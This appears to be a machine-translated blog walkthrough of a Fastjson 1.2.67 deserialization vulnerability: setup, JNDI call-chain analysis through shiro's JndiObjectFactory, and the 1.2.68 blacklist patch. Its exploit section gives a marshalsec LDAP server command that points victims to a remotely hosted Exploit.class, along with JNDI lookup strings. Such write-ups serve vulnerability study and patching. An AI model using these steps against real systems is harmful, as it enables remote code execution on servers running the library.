Shulou(Shulou.com)05/31 Report--

Today, I will talk to you about how to analyze the Fastjson vulnerability environment and vulnerability recurrence. Many people may not know much about it. In order to let everyone know more, Xiaobian summarizes the following contents for everyone. I hope you can gain something according to this article.

0x01 Fastjson Profile

Fastjson is Alibaba's open source JSON parsing library, which can parse strings in JSON format, support serialization of Java Beans to JSON strings, and deserialize from JSON strings to JavaBeans.

https://github.com/alibaba/fastjson

0x02 Environment setup

JDK version: 8u112

fastjson: 1.2.67

shiro: 1.5.1

slf4j-nop: 1.7.25

0x1 Add dependency package

To quickly add jar packages needed for your project, create a Maven project as follows

pom.xml

After that, right-click pom.xml and click Download source and document.

0x2 Select JDK version

This vulnerability selects JDK 8u112

0x3 Write vulnerability code

Add vulnerability code to main folder, core is calling fastjson.JSON parseObject function

0x03 Vulnerability Principle 0x1 FastJson Class Analysis

Fastjson interface is simple and easy to use, widely used in cache serialization, protocol interaction, Web output, Android client provides two main interfaces toJsonString and parseObject to implement serialization and deserialization respectively.

Both parse and parseObject methods in FastJson can be used to deserialize JSON strings into Java objects, and parseObject is essentially a call to parse for deserialization. But parseObject additionally converts Java objects into JSONObject objects, JSON.toJSON. So the detail difference when deserializing is that parse recognizes and calls the setter method of the target class and the getter method of certain conditions, while parseObject calls all setter and getter methods of the target class during the process due to JSON.toJSON(obj) execution.

fastjson.java

As you can see from the results, calling the parseObject function calls the getattr method.

0x2 vulnerability call chain analysis

Call stack analysis

1. parseObject object type conversion

This step converts the object type corresponding to obj to json format, which must be directed to the getattr object method, thus triggering the vulnerability.

2. reflection call

The getinstance method is invoked via the invoke method

3. Trigger ldap

This.lookup(resourceName) was called in JndiObjectFactory getinstance

0x3 JNDI injection

Java Name Directory Interface (JNDI) is a Java API similar to an index hub that allows clients to discover and lookup data and objects by name. JNDI includes Naming Service and Directory Service, APIs for finding data and objects by name, also known as a binding. JNDI can access existing directories and services: JDBC, LDAP, RMI, DNS, NIS, CORBA.

Its application scenarios such as: dynamic loading of database configuration files, so as to keep the database code unchanged.

Injection method:

JNDI Reference RMI

JNDI Reference with LDAP

RMI format:ctx.lookup("

rmi://localhost:9999/refObj");

LDAP format ctx.lookup("

ldap://localhost:9999/refObj");

If the parameters in the lookup function are controllable by the attacker, they can point to the attacker's server, and JNDI injection can be implemented to implement arbitrary code execution.

1 RMI

RMI (Remote Method Invocation). Remote method invocation is a basic idea in distributed programming. CORBA and Web Service are the technologies to realize remote method invocation (which are independent of programming language). RMI is designed specifically for Java and relies on the JRMP communication protocol.

2 LDAP

LDAP (Lightweight Directory Access Protocol) is a directory service protocol that runs on top of TCP/IP stack. A directory service is a specialized database that holds descriptive, attribute-based details, enables querying, browsing, and searching, and organizes data in a tree structure. LDAP is identified by tree structure, so it cannot be queried by SQL statement like table. It has strong "read" performance, but poor "write" performance, and has no complex functions such as transaction processing and rollback, so it is not suitable for storing frequently modified data. The difference between an LDAP directory and an RMI registry is that the former is a directory service and allows the assignment of attributes for stored objects.

The vulnerability simply uses the jndi feature in the org.apache.shiro package to access the ldap service built by itself, obtain and execute the Exploit.class file compiled by itself.

0x04 Exploit 0x1 Compile Java Exploit Code

0x2 Start LDAP service

Start a ladp server using marshalsec and download it at

https://github.com/mbechler/marshalsec

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8089/#Exploit

0x3 Open HTTP Web Services

Place the compiled Exploit.class in the web directory and open the service

0x05 Bug Patch

This link combs the jar corresponding to fastjson hash, which makes it easy to find filtered jar packages

https://github.com/LeadroyaL/fastjson-blacklist

The vulnerability was patched by blacklisting, banning org.apache.shiro.jndi in 1.2.68

The corresponding code is shown in the following figure. There is corresponding processing in the public ClasscheckAutoType (String typeName, Class expectClass, int features) function.

Blacklist hash generation algorithm, probably the idea is to carry out exclusive or superposition of each bit.

After reading the above, do you have any further understanding of how to analyze the Fastjson vulnerability environment and vulnerability recurrence? If you still want to know more knowledge or related content, please pay attention to the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.